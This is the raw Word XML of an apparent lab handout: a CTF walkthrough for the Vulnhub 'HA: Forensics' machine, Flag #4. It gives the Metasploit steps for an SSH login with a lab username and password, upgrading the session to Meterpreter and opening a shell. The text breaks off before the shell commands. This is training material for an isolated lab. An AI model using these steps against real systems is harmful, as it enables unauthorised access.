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2A558" w14:textId="1C941F9E" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lab – CTF Walkthrough for HA: Forensics Flag #</w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BDDE1C" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFEC810" w14:textId="494540CC" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>last</w:t>
      </w:r>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lab, you will be tasked with capturing Flag #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this CTF. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DC0D7" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEBC656" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab requires the use of VMware Workstation Player. The forensic target was built using VMware, and though it is an OVA file, it will not acquire an IP address using DHCP when imported into VirtualBox.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292476A2" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Install of </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00211339">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>VMware Workstation Player</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76E7F0D3" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once virtual install of </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00211339">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Kali Linux for VMWare</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324FEB3" w14:textId="18E9A516" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The OVA image file for HA: Forensics Target downloaded from </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00211339">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Vulnhub</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1DB98" w14:textId="5A424E07" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Begin the Lab!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADFBF9" w14:textId="3B3504F5" w:rsidR="00211339" w:rsidRDefault="00211339">
      <w:r>
        <w:t xml:space="preserve">If you </w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F">
        <w:t>ended</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> your Meterpreter session established in the last lab, you can quickly reestablish it by just doing the following. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27860ACF" w14:textId="7C0C0789" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD4F3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Make sure your Kali machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the target have their</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4F3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> network set to host-only.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C597473" w14:textId="77777777"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t>Open a new terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED54407" w14:textId="77777777" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">At the prompt, start Metasploit. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="069FC219" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00753405" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">At the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>msf6 prompt,</w:t>
      </w:r>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the following commands, one line at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5EECE" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00753405" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="450737BE" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00753405" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>107</w:t>
      </w:r>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F244DF" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00753405" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">set username </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>jasoos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2948F87A" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00753405" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>set password Password@1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D42C9" w14:textId="6A34D6D8" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753405">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422885D9" w14:textId="21697CAD" w:rsidR="00211339" w:rsidRDefault="00211339">
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0179A317" wp14:editId="1BBA1EDC">
            <wp:extent cx="59436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5965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F849B" w14:textId="77777777"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t>To send our Metasploit session to the background, we first need to assign it a session number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F0B98" w14:textId="77777777"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t>At the prompt, type the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CA587" w14:textId="258F8F5C" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71E57">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB8EC8" w14:textId="77777777" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit is now ready to be sent to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>background. To do this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> and bring forward our </w:t>
      </w:r>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Meterpreter session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>sessions 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66913B16" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00875337" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F37B1D9" wp14:editId="36AEA348">
            <wp:extent cx="4124901" cy="35247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352474"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94B02D" w14:textId="6EDD84FA" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Notice your prompt changes letting you know </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">now have a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Meterpreter session established</w:t>
      </w:r>
      <w:r w:rsidRPr="00875337">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> between Kali and your target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA2FFA" w14:textId="545E6D41"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t>Next, we need to establish a bash shell on the target. At the Meterpreter prompt, type the following commands one at a time. Do not leave off the tick!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459234F3" w14:textId="11943A21" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E86ACE5" wp14:editId="0FA3D424">
            <wp:extent cx="3982006"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962159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF4C6E" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00B304D3" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
